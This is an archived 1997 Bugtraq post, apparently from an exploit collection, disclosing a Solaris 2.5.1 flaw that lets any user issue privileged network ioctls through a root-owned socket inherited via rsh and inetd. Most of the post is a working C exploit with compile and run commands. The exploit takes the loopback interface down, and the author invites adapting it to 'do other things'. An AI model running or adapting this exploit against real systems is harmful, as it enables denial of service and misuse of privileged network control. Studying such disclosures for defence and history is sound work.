Solaris root socket descriptor bug
Description: | You can swipe control of a root owned socket descriptor from user-owned inetd processes like rshd. |
Author: | Alan Cox (alan@LXORGUK.UKUU.ORG.UK) |
Compromise: | control of a root owned socket |
Vulnerable Systems: | Solaris 2.5.1, probably earlier versions. I hear that 2.6 is fixed. Sun doesn't seem interested in fixing this, for some reason. |
Date: | 19 June 1997 was the date of this post, although Alan has been complaining about the bug for ages. |
Notes: | You may have to change your interface to le0, hme0, or whatever to make it work. |
Solaris 2.5.1 party piece
Alan Cox (alan@LXORGUK.UKUU.ORG.UK)
Thu, 19 Jun 1997 15:27:39 +0100
Well, CERT have had this for a year, AUSCERT for a couple of weeks, and now it's time Bugtraq had it.
cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck
solarisuck.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>

int main(int argc, char *argv[])
{
	struct ifreq please_break_me;

	/* fd 0 is the connection socket rshd inherited from inetd: root
	 * created it, but this process runs as the rsh user. */
	memset(&please_break_me, 0, sizeof(please_break_me));
	strncpy(please_break_me.ifr_name, "lo0", IFNAMSIZ - 1);
	please_break_me.ifr_flags = 0;	/* clear every flag: takes lo0 down */

	/* A privileged interface ioctl issued through the root-created socket */
	if (ioctl(0, SIOCSIFFLAGS, &please_break_me) == -1)
		perror("Damn it didnt work. Obviously not Solaris ;)");
	return 0;
}
You can adjust this to do other things. Basically any user can do network control
requests on a root created socket descriptor.
Workarounds:
1. Disable rsh and any non-root-owned inetd tasks - breaks remote tar etc.
2. Run an OS that the vendor doesn't take a year to fix bugs in
I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
to prove Sun have sat on this for ages.
Alan
This page is part of Fyodor's exploit world.